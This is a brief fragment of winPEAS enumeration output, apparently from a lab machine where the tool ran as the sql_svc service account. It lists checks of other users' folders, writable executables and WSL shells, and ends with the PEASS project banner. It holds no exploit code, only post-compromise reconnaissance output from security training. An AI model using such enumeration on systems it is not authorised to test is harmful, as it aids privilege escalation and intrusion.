C:\Users\All Users

╔══════════╣ Searching interesting files in other users home directories (can be slow)

Checking folder: c:\users\administrator


=================================================================================================

╔══════════╣ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Users\Public\winpeas.exe": sql_svc [AllAccess],Service [WriteData/CreateFiles]

╔══════════╣ Looking for Linux shells/distributions - wsl.exe, bash.exe

/---------------------------------------------------------------------------------\
|                               Do you like PEASS?                                |
|---------------------------------------------------------------------------------|
|         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
|         Follow on Twitter         :     @hacktricks_live                        |
|         Respect on HTB            :     SirBroccoli                             |
|---------------------------------------------------------------------------------|
|                                   Thank you!                                    |
\---------------------------------------------------------------------------------/
